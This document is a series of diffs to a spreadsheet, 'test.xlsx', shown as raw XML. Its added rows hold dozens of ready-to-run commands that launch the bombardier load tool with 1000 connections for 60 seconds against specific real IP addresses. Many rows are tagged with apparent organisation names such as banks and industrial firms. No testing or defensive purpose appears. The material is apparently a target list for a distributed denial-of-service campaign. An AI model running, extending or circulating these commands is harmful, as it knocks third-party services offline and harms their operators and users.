+    <t>194.84.143.170</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.176.31.67&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.176.31.67</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.176.31.73&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.176.31.73</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.176.31.79&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.176.31.79</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.28.163.132&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>37.28.163.132</t>
   </si>
 </sst>
 </file>
@@ -1880,100 +1973,198 @@
       <c r="E36" s="3"/>
     </row>
     <row r="37" ht="15.35" customHeight="1">
-      <c r="A37" s="2"/>
-      <c r="B37" s="2"/>
-      <c r="C37" s="2"/>
+      <c r="A37" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B37&amp;"&amp;&amp; sleep 5;"</f>
+        <v>42</v>
+      </c>
+      <c r="B37" t="s" s="2">
+        <v>43</v>
+      </c>
+      <c r="C37" t="s" s="2">
+        <v>44</v>
+      </c>
       <c r="D37" s="6"/>
       <c r="E37" s="3"/>
     </row>
     <row r="38" ht="15.35" customHeight="1">
-      <c r="A38" s="2"/>
-      <c r="B38" s="2"/>
-      <c r="C38" s="2"/>
+      <c r="A38" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B38&amp;"&amp;&amp; sleep 5;"</f>
+        <v>45</v>
+      </c>
+      <c r="B38" t="s" s="2">
+        <v>46</v>
+      </c>
+      <c r="C38" t="s" s="2">
+        <v>44</v>
+      </c>
       <c r="D38" s="6"/>
       <c r="E38" s="3"/>
     </row>
     <row r="39" ht="15.35" customHeight="1">
-      <c r="A39" s="2"/>
-      <c r="B39" s="2"/>
-      <c r="C39" s="2"/>
+      <c r="A39" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B39&amp;"&amp;&amp; sleep 5;"</f>
+        <v>47</v>
+      </c>
+      <c r="B39" t="s" s="2">
+        <v>48</v>
+      </c>
+      <c r="C39" t="s" s="2">
+        <v>49</v>
+      </c>
       <c r="D39" s="6"/>
       <c r="E39" s="3"/>
     </row>
     <row r="40" ht="15.35" customHeight="1">
-      <c r="A40" s="2"/>
-      <c r="B40" s="2"/>
-      <c r="C40" s="2"/>
+      <c r="A40" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B40&amp;"&amp;&amp; sleep 5;"</f>
+        <v>50</v>
+      </c>
+      <c r="B40" t="s" s="2">
+        <v>51</v>
+      </c>
+      <c r="C40" t="s" s="2">
+        <v>49</v>
+      </c>
       <c r="D40" s="6"/>
       <c r="E40" s="3"/>
     </row>
     <row r="41" ht="15.35" customHeight="1">
-      <c r="A41" s="2"/>
-      <c r="B41" s="2"/>
-      <c r="C41" s="2"/>
+      <c r="A41" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B41&amp;"&amp;&amp; sleep 5;"</f>
+        <v>52</v>
+      </c>
+      <c r="B41" t="s" s="2">
+        <v>53</v>
+      </c>
+      <c r="C41" t="s" s="2">
+        <v>49</v>
+      </c>
       <c r="D41" s="6"/>
       <c r="E41" s="3"/>
     </row>
     <row r="42" ht="15.35" customHeight="1">
-      <c r="A42" s="2"/>
-      <c r="B42" s="2"/>
-      <c r="C42" s="2"/>
+      <c r="A42" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B42&amp;"&amp;&amp; sleep 5;"</f>
+        <v>54</v>
+      </c>
+      <c r="B42" t="s" s="2">
+        <v>55</v>
+      </c>
+      <c r="C42" t="s" s="2">
+        <v>49</v>
+      </c>
       <c r="D42" s="6"/>
       <c r="E42" s="3"/>
     </row>
     <row r="43" ht="15.35" customHeight="1">
-      <c r="A43" s="2"/>
-      <c r="B43" s="2"/>
-      <c r="C43" s="2"/>
+      <c r="A43" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B43&amp;"&amp;&amp; sleep 5;"</f>
+        <v>56</v>
+      </c>
+      <c r="B43" t="s" s="2">
+        <v>57</v>
+      </c>
+      <c r="C43" t="s" s="2">
+        <v>58</v>
+      </c>
       <c r="D43" s="6"/>
       <c r="E43" s="3"/>
     </row>
     <row r="44" ht="15.35" customHeight="1">
-      <c r="A44" s="2"/>
-      <c r="B44" s="2"/>
-      <c r="C44" s="2"/>
+      <c r="A44" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B44&amp;"&amp;&amp; sleep 5;"</f>
+        <v>59</v>
+      </c>
+      <c r="B44" t="s" s="2">
+        <v>60</v>
+      </c>
+      <c r="C44" t="s" s="2">
+        <v>58</v>
+      </c>
       <c r="D44" s="6"/>
       <c r="E44" s="3"/>
     </row>
     <row r="45" ht="15.35" customHeight="1">
-      <c r="A45" s="2"/>
-      <c r="B45" s="2"/>
-      <c r="C45" s="2"/>
+      <c r="A45" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B45&amp;"&amp;&amp; sleep 5;"</f>
+        <v>61</v>
+      </c>
+      <c r="B45" t="s" s="2">
+        <v>62</v>
+      </c>
+      <c r="C45" t="s" s="2">
+        <v>58</v>
+      </c>
       <c r="D45" s="6"/>
       <c r="E45" s="3"/>
     </row>
     <row r="46" ht="15.35" customHeight="1">
-      <c r="A46" s="2"/>
-      <c r="B46" s="2"/>
-      <c r="C46" s="2"/>
+      <c r="A46" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B46&amp;"&amp;&amp; sleep 5;"</f>
+        <v>63</v>
+      </c>
+      <c r="B46" t="s" s="2">
+        <v>64</v>
+      </c>
+      <c r="C46" t="s" s="2">
+        <v>58</v>
+      </c>
       <c r="D46" s="6"/>
       <c r="E46" s="3"/>
     </row>
     <row r="47" ht="15.35" customHeight="1">
-      <c r="A47" s="2"/>
-      <c r="B47" s="2"/>
-      <c r="C47" s="2"/>
+      <c r="A47" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B47&amp;"&amp;&amp; sleep 5;"</f>
+        <v>65</v>
+      </c>
+      <c r="B47" t="s" s="2">
+        <v>66</v>
+      </c>
+      <c r="C47" t="s" s="2">
+        <v>58</v>
+      </c>
       <c r="D47" s="6"/>
       <c r="E47" s="3"/>
     </row>
     <row r="48" ht="15.35" customHeight="1">
-      <c r="A48" s="2"/>
-      <c r="B48" s="2"/>
-      <c r="C48" s="2"/>
+      <c r="A48" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B48&amp;"&amp;&amp; sleep 5;"</f>
+        <v>67</v>
+      </c>
+      <c r="B48" t="s" s="2">
+        <v>68</v>
+      </c>
+      <c r="C48" t="s" s="2">
+        <v>58</v>
+      </c>
       <c r="D48" s="6"/>
       <c r="E48" s="3"/>
     </row>
     <row r="49" ht="15.35" customHeight="1">
-      <c r="A49" s="2"/>
-      <c r="B49" s="2"/>
-      <c r="C49" s="2"/>
+      <c r="A49" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B49&amp;"&amp;&amp; sleep 5;"</f>
+        <v>69</v>
+      </c>
+      <c r="B49" t="s" s="2">
+        <v>70</v>
+      </c>
+      <c r="C49" t="s" s="2">
+        <v>58</v>
+      </c>
       <c r="D49" s="6"/>
       <c r="E49" s="3"/>
     </row>
     <row r="50" ht="15.35" customHeight="1">
-      <c r="A50" s="2"/>
-      <c r="B50" s="2"/>
-      <c r="C50" s="2"/>
+      <c r="A50" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B50&amp;"&amp;&amp; sleep 5;"</f>
+        <v>71</v>
+      </c>
+      <c r="B50" t="s" s="2">
+        <v>72</v>
+      </c>
+      <c r="C50" t="s" s="2">
+        <v>58</v>
+      </c>
       <c r="D50" s="6"/>
       <c r="E50" s="3"/>
     </row>

--- a/test.xlsx
+++ b/test.xlsx
@@ -11,7 +11,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="73">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="121">
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.239.13&amp;&amp; sleep 5;</t>
   </si>
@@ -230,6 +230,150 @@
   </si>
   <si>
     <t>37.28.163.132</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.24.64.246&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.24.64.246</t>
+  </si>
+  <si>
+    <t>nmg</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.28.44.8&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>193.28.44.8</t>
+  </si>
+  <si>
+    <t>raiffeisen</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.238.73.126&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.238.73.126</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.238.73.204&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.238.73.204</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.232.135.221&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.232.135.221</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.13.191.10&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>217.13.191.10</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.28.44.67&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>193.28.44.67</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.238.73.5&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.238.73.5</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.238.73.244&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.238.73.244</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.28.44.24&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>193.28.44.24</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.186.167.246&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>194.186.167.246</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.190.20.107&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>194.190.20.107</t>
+  </si>
+  <si>
+    <t>rgs</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.135.16.84&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>194.135.16.84</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.200.59.203&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>5.200.59.203</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.190.20.106&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>194.190.20.106</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.190.111.65&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>194.190.111.65</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.190.20.105&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>194.190.20.105</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.243.90.73&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>188.243.90.73</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.17.10.74&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.17.10.74</t>
+  </si>
+  <si>
+    <t>rossetimr</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.53.118.141&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>92.53.118.141</t>
+  </si>
+  <si>
+    <t>segezha-group</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.23.51.195&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>5.23.51.195</t>
+  </si>
+  <si>
+    <t>severstal-avia</t>
   </si>
 </sst>
 </file>
@@ -2169,149 +2313,296 @@
       <c r="E50" s="3"/>
     </row>
     <row r="51" ht="15.35" customHeight="1">
-      <c r="A51" s="2"/>
-      <c r="B51" s="2"/>
-      <c r="C51" s="2"/>
+      <c r="A51" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B51&amp;"&amp;&amp; sleep 5;"</f>
+        <v>73</v>
+      </c>
+      <c r="B51" t="s" s="2">
+        <v>74</v>
+      </c>
+      <c r="C51" t="s" s="2">
+        <v>75</v>
+      </c>
       <c r="D51" s="6"/>
       <c r="E51" s="3"/>
     </row>
     <row r="52" ht="15.35" customHeight="1">
-      <c r="A52" s="2"/>
-      <c r="B52" s="2"/>
-      <c r="C52" s="2"/>
+      <c r="A52" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B52&amp;"&amp;&amp; sleep 5;"</f>
+        <v>76</v>
+      </c>
+      <c r="B52" t="s" s="2">
+        <v>77</v>
+      </c>
+      <c r="C52" t="s" s="2">
+        <v>78</v>
+      </c>
       <c r="D52" s="6"/>
       <c r="E52" s="3"/>
     </row>
     <row r="53" ht="15.35" customHeight="1">
-      <c r="A53" s="2"/>
-      <c r="B53" s="2"/>
-      <c r="C53" s="2"/>
+      <c r="A53" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B53&amp;"&amp;&amp; sleep 5;"</f>
+        <v>79</v>
+      </c>
+      <c r="B53" t="s" s="2">
+        <v>80</v>
+      </c>
+      <c r="C53" t="s" s="2">
+        <v>78</v>
+      </c>
       <c r="D53" s="6"/>
       <c r="E53" s="3"/>
     </row>
     <row r="54" ht="15.35" customHeight="1">
-      <c r="A54" s="2"/>
-      <c r="B54" s="2"/>
-      <c r="C54" s="2"/>
+      <c r="A54" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B54&amp;"&amp;&amp; sleep 5;"</f>
+        <v>81</v>
+      </c>
+      <c r="B54" t="s" s="2">
+        <v>82</v>
+      </c>
+      <c r="C54" t="s" s="2">
+        <v>78</v>
+      </c>
       <c r="D54" s="6"/>
       <c r="E54" s="3"/>
     </row>
     <row r="55" ht="15.35" customHeight="1">
-      <c r="A55" s="2"/>
-      <c r="B55" s="2"/>
-      <c r="C55" s="2"/>
+      <c r="A55" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B55&amp;"&amp;&amp; sleep 5;"</f>
+        <v>83</v>
+      </c>
+      <c r="B55" t="s" s="2">
+        <v>84</v>
+      </c>
+      <c r="C55" t="s" s="2">
+        <v>78</v>
+      </c>
       <c r="D55" s="6"/>
       <c r="E55" s="3"/>
     </row>
     <row r="56" ht="15.35" customHeight="1">
-      <c r="A56" s="2"/>
-      <c r="B56" s="2"/>
-      <c r="C56" s="2"/>
+      <c r="A56" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B56&amp;"&amp;&amp; sleep 5;"</f>
+        <v>85</v>
+      </c>
+      <c r="B56" t="s" s="2">
+        <v>86</v>
+      </c>
+      <c r="C56" t="s" s="2">
+        <v>78</v>
+      </c>
       <c r="D56" s="6"/>
       <c r="E56" s="3"/>
     </row>
     <row r="57" ht="15.35" customHeight="1">
-      <c r="A57" s="2"/>
-      <c r="B57" s="2"/>
-      <c r="C57" s="2"/>
+      <c r="A57" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B57&amp;"&amp;&amp; sleep 5;"</f>
+        <v>87</v>
+      </c>
+      <c r="B57" t="s" s="2">
+        <v>88</v>
+      </c>
+      <c r="C57" t="s" s="2">
+        <v>78</v>
+      </c>
       <c r="D57" s="5"/>
       <c r="E57" s="3"/>
     </row>
     <row r="58" ht="15.35" customHeight="1">
-      <c r="A58" s="2"/>
-      <c r="B58" s="2"/>
-      <c r="C58" s="2"/>
+      <c r="A58" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B58&amp;"&amp;&amp; sleep 5;"</f>
+        <v>89</v>
+      </c>
+      <c r="B58" t="s" s="2">
+        <v>90</v>
+      </c>
+      <c r="C58" t="s" s="2">
+        <v>78</v>
+      </c>
       <c r="D58" s="3"/>
       <c r="E58" s="3"/>
     </row>
     <row r="59" ht="15.35" customHeight="1">
-      <c r="A59" s="2"/>
-      <c r="B59" s="2"/>
-      <c r="C59" s="2"/>
+      <c r="A59" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B59&amp;"&amp;&amp; sleep 5;"</f>
+        <v>91</v>
+      </c>
+      <c r="B59" t="s" s="2">
+        <v>92</v>
+      </c>
+      <c r="C59" t="s" s="2">
+        <v>78</v>
+      </c>
       <c r="D59" s="3"/>
       <c r="E59" s="3"/>
     </row>
     <row r="60" ht="15.35" customHeight="1">
-      <c r="A60" s="2"/>
-      <c r="B60" s="2"/>
-      <c r="C60" s="2"/>
+      <c r="A60" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B60&amp;"&amp;&amp; sleep 5;"</f>
+        <v>93</v>
+      </c>
+      <c r="B60" t="s" s="2">
+        <v>94</v>
+      </c>
+      <c r="C60" t="s" s="2">
+        <v>78</v>
+      </c>
       <c r="D60" s="3"/>
       <c r="E60" s="3"/>
     </row>
     <row r="61" ht="15.35" customHeight="1">
-      <c r="A61" s="2"/>
-      <c r="B61" s="2"/>
-      <c r="C61" s="2"/>
+      <c r="A61" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B61&amp;"&amp;&amp; sleep 5;"</f>
+        <v>95</v>
+      </c>
+      <c r="B61" t="s" s="2">
+        <v>96</v>
+      </c>
+      <c r="C61" t="s" s="2">
+        <v>78</v>
+      </c>
       <c r="D61" s="3"/>
       <c r="E61" s="3"/>
     </row>
     <row r="62" ht="15.35" customHeight="1">
-      <c r="A62" s="2"/>
-      <c r="B62" s="2"/>
-      <c r="C62" s="2"/>
+      <c r="A62" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B62&amp;"&amp;&amp; sleep 5;"</f>
+        <v>97</v>
+      </c>
+      <c r="B62" t="s" s="2">
+        <v>98</v>
+      </c>
+      <c r="C62" t="s" s="2">
+        <v>99</v>
+      </c>
       <c r="D62" s="3"/>
       <c r="E62" s="3"/>
     </row>
     <row r="63" ht="15.35" customHeight="1">
-      <c r="A63" s="2"/>
-      <c r="B63" s="2"/>
-      <c r="C63" s="2"/>
+      <c r="A63" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B63&amp;"&amp;&amp; sleep 5;"</f>
+        <v>100</v>
+      </c>
+      <c r="B63" t="s" s="2">
+        <v>101</v>
+      </c>
+      <c r="C63" t="s" s="2">
+        <v>99</v>
+      </c>
       <c r="D63" s="3"/>
       <c r="E63" s="3"/>
     </row>
     <row r="64" ht="15.35" customHeight="1">
-      <c r="A64" s="2"/>
-      <c r="B64" s="2"/>
-      <c r="C64" s="2"/>
+      <c r="A64" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B64&amp;"&amp;&amp; sleep 5;"</f>
+        <v>102</v>
+      </c>
+      <c r="B64" t="s" s="2">
+        <v>103</v>
+      </c>
+      <c r="C64" t="s" s="2">
+        <v>99</v>
+      </c>
       <c r="D64" s="3"/>
       <c r="E64" s="3"/>
     </row>
     <row r="65" ht="15.35" customHeight="1">
-      <c r="A65" s="2"/>
-      <c r="B65" s="2"/>
-      <c r="C65" s="2"/>
+      <c r="A65" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B65&amp;"&amp;&amp; sleep 5;"</f>
+        <v>104</v>
+      </c>
+      <c r="B65" t="s" s="2">
+        <v>105</v>
+      </c>
+      <c r="C65" t="s" s="2">
+        <v>99</v>
+      </c>
       <c r="D65" s="3"/>
       <c r="E65" s="3"/>
     </row>
     <row r="66" ht="15.35" customHeight="1">
-      <c r="A66" s="2"/>
-      <c r="B66" s="2"/>
-      <c r="C66" s="2"/>
+      <c r="A66" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B66&amp;"&amp;&amp; sleep 5;"</f>
+        <v>106</v>
+      </c>
+      <c r="B66" t="s" s="2">
+        <v>107</v>
+      </c>
+      <c r="C66" t="s" s="2">
+        <v>99</v>
+      </c>
       <c r="D66" s="3"/>
       <c r="E66" s="3"/>
     </row>
     <row r="67" ht="15.35" customHeight="1">
-      <c r="A67" s="2"/>
-      <c r="B67" s="7"/>
-      <c r="C67" s="2"/>
+      <c r="A67" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B67&amp;"&amp;&amp; sleep 5;"</f>
+        <v>108</v>
+      </c>
+      <c r="B67" t="s" s="7">
+        <v>109</v>
+      </c>
+      <c r="C67" t="s" s="2">
+        <v>99</v>
+      </c>
       <c r="D67" s="3"/>
       <c r="E67" s="3"/>
     </row>
     <row r="68" ht="15.35" customHeight="1">
-      <c r="A68" s="2"/>
-      <c r="B68" s="8"/>
-      <c r="C68" s="2"/>
+      <c r="A68" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B68&amp;"&amp;&amp; sleep 5;"</f>
+        <v>110</v>
+      </c>
+      <c r="B68" t="s" s="8">
+        <v>111</v>
+      </c>
+      <c r="C68" t="s" s="2">
+        <v>99</v>
+      </c>
       <c r="D68" s="3"/>
       <c r="E68" s="3"/>
     </row>
     <row r="69" ht="15.35" customHeight="1">
-      <c r="A69" s="2"/>
-      <c r="B69" s="8"/>
-      <c r="C69" s="2"/>
+      <c r="A69" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B69&amp;"&amp;&amp; sleep 5;"</f>
+        <v>112</v>
+      </c>
+      <c r="B69" t="s" s="8">
+        <v>113</v>
+      </c>
+      <c r="C69" t="s" s="2">
+        <v>114</v>
+      </c>
       <c r="D69" s="3"/>
       <c r="E69" s="3"/>
     </row>
     <row r="70" ht="15.35" customHeight="1">
-      <c r="A70" s="2"/>
-      <c r="B70" s="8"/>
-      <c r="C70" s="2"/>
+      <c r="A70" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B70&amp;"&amp;&amp; sleep 5;"</f>
+        <v>115</v>
+      </c>
+      <c r="B70" t="s" s="8">
+        <v>116</v>
+      </c>
+      <c r="C70" t="s" s="2">
+        <v>117</v>
+      </c>
       <c r="D70" s="3"/>
       <c r="E70" s="3"/>
     </row>
     <row r="71" ht="15.35" customHeight="1">
-      <c r="A71" s="2"/>
-      <c r="B71" s="8"/>
-      <c r="C71" s="2"/>
+      <c r="A71" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B71&amp;"&amp;&amp; sleep 5;"</f>
+        <v>118</v>
+      </c>
+      <c r="B71" t="s" s="8">
+        <v>119</v>
+      </c>
+      <c r="C71" t="s" s="2">
+        <v>120</v>
+      </c>
       <c r="D71" s="3"/>
       <c r="E71" s="3"/>
     </row>

--- a/test.xlsx
+++ b/test.xlsx
@@ -11,7 +11,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="121">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="152">
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.239.13&amp;&amp; sleep 5;</t>
   </si>
@@ -374,6 +374,99 @@
   </si>
   <si>
     <t>severstal-avia</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.94&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.114.94</t>
+  </si>
+  <si>
+    <t>efko</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.95&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.114.95</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.239.33.178&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.239.33.178</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.91&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.114.91</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.92&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.114.92</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.115.54&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.115.54</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.93&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.114.93</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.89&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.114.89</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.115.50&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.115.50</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.88&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.114.88</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.239.33.180&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.239.33.180</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.43.90.110&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.43.90.110</t>
+  </si>
+  <si>
+    <t>homecredit</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.154.197.231&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.154.197.231</t>
+  </si>
+  <si>
+    <t>samolet_ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.202.246.121&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>82.202.246.121</t>
   </si>
 </sst>
 </file>
@@ -2607,107 +2700,212 @@
       <c r="E71" s="3"/>
     </row>
     <row r="72" ht="15.35" customHeight="1">
-      <c r="A72" s="2"/>
-      <c r="B72" s="8"/>
-      <c r="C72" s="2"/>
+      <c r="A72" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B72&amp;"&amp;&amp; sleep 5;"</f>
+        <v>121</v>
+      </c>
+      <c r="B72" t="s" s="8">
+        <v>122</v>
+      </c>
+      <c r="C72" t="s" s="2">
+        <v>123</v>
+      </c>
       <c r="D72" s="3"/>
       <c r="E72" s="3"/>
     </row>
     <row r="73" ht="15.35" customHeight="1">
-      <c r="A73" s="2"/>
-      <c r="B73" s="8"/>
-      <c r="C73" s="2"/>
+      <c r="A73" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B73&amp;"&amp;&amp; sleep 5;"</f>
+        <v>124</v>
+      </c>
+      <c r="B73" t="s" s="8">
+        <v>125</v>
+      </c>
+      <c r="C73" t="s" s="2">
+        <v>123</v>
+      </c>
       <c r="D73" s="3"/>
       <c r="E73" s="3"/>
     </row>
